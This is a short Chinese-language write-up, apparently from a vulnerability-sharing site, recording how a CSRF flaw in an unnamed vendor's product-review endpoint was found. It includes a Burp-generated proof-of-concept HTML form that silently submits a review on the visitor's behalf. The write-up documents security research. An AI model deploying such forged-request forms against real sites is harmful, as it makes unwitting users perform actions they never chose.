挖掘某厂商CSRF漏洞过程记录

首先评论and关注的数据包中一定带有用户的ID
那么ID就在源码中,如下图:

140fa0d6b577956c749607c8835816ea

图中的 "323320" 这个就产品的ID然后我们点进去用户评论的

挖掘某厂商CSRF漏洞过程记录

在此处评论,我们用Burp截包

挖掘某厂商CSRF漏洞过程记录

11是我们评论的内容, 323320是产品的ID 刚刚也看了 我已经圈出来了

我们在用burp生成csrf的界面

挖掘某厂商CSRF漏洞过程记录

代码如下:

<code>&lt;html&gt;
  &lt;!-- CSRF PoC - generated by burp suite professional --&gt;
  &lt;body&gt;
    &lt;form action="<strong>http</strong>://www.xxxxx.cn/Ajax/FeedBack/AjaxPostReview.aspx" method="POST"&gt;
      &lt;input type="hidden" name="images" value="" /&gt;
      &lt;input type="hidden" name="tags" value="" /&gt;
      &lt;input type="hidden" name="score" value="" /&gt;
      &lt;input type="hidden" name="content" value="11" /&gt;
      &lt;input type="hidden" name="referencesysno" value="323320" /&gt;
      &lt;input type="hidden" name="type" value="" /&gt;
      &lt;input type="hidden" name="rmasysno" value="&amp;#45;1" /&gt;
      &lt;input type="hidden" name="linktype" value="&amp;#45;1" /&gt;
      &lt;input type="hidden" name="linksysno" value="&amp;#45;1" /&gt;
      &lt;input type="submit" value="Submit form" /&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;</code>

我们新建并保存在csrf.html中。

我们先看看我评论的次数

挖掘某厂商CSRF漏洞过程记录

评论了6次
然后我们在打开csrf.html 单击按钮出现以下代码

挖掘某厂商CSRF漏洞过程记录

我们再去刷新下网址看看

挖掘某厂商CSRF漏洞过程记录

从而发现是评论的
我们在会去看看我们的评论处有没有增加

挖掘某厂商CSRF漏洞过程记录

可以看到多了一篇评论,从而CSRF的简单漏洞挖掘过程

作者:破童
来源:漏洞银行